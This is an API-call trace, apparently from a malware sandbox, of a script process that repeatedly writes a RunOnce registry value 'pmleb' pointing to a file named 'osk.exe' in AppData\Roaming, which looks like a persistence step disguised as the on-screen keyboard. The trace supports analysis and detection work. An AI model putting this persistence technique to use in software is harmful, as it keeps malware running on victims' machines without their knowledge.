0 [0079.753] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0079.753] KillTimer (hWnd=0x20280, uIDEvent=0x204e) returned 1 [0079.753] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.753] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0079.753] IUnknown:Release (This=0x787518) returned 0x1 [0079.753] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0079.753] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0079.753] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0079.754] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0079.754] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0079.754] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0079.754] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0079.754] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0079.754] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0079.754] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x4f [0079.754] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0079.754] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x50 [0079.754] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0079.755] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x4f [0079.755] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.755] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0079.755] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.755] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.755] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0079.755] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0079.755] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0079.755] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0079.755] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0079.755] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0079.755] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0079.755] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0079.756] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0079.756] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0079.756] RegCloseKey (hKey=0x280) returned 0x0 [0079.756] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.756] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.756] SetTimer (hWnd=0x20280, nIDEvent=0x204f, uElapse=0xa, lpTimerFunc=0x0) returned 0x204f [0079.756] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0079.768] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0079.768] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0079.768] KillTimer (hWnd=0x20280, uIDEvent=0x204f) returned 1 [0079.769] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.769] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0079.769] IUnknown:Release (This=0x787518) returned 0x1 [0079.769] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0079.769] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0079.769] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0079.769] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0079.769] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0079.769] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0079.769] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0079.769] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0079.769] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0079.770] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x50 [0079.770] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0079.770] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x51 [0079.770] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0079.770] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x50 [0079.770] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.770] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0079.771] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.771] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.771] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0079.771] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0079.771] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0079.771] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0079.771] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0079.771] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0079.771] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0079.771] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0079.771] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0079.771] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0079.771] RegCloseKey (hKey=0x280) returned 0x0 [0079.771] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.771] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.772] SetTimer (hWnd=0x20280, nIDEvent=0x2050, uElapse=0xa, lpTimerFunc=0x0) returned 0x2050 [0079.772] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0079.784] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0079.784] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0079.784] KillTimer (hWnd=0x20280, uIDEvent=0x2050) returned 1 [0079.784] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.784] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0079.785] IUnknown:Release (This=0x787518) returned 0x1 [0079.785] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0079.785] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0079.785] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0079.785] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0079.785] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0079.785] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0079.785] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0079.785] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0079.785] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0079.785] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x51 [0079.785] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0079.785] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x52 [0079.785] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0079.786] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x51 [0079.786] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.786] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0079.786] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.786] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.786] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0079.786] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0079.787] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0079.787] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0079.787] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0079.787] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0079.787] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0079.787] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0079.787] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0079.787] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0079.787] RegCloseKey (hKey=0x280) returned 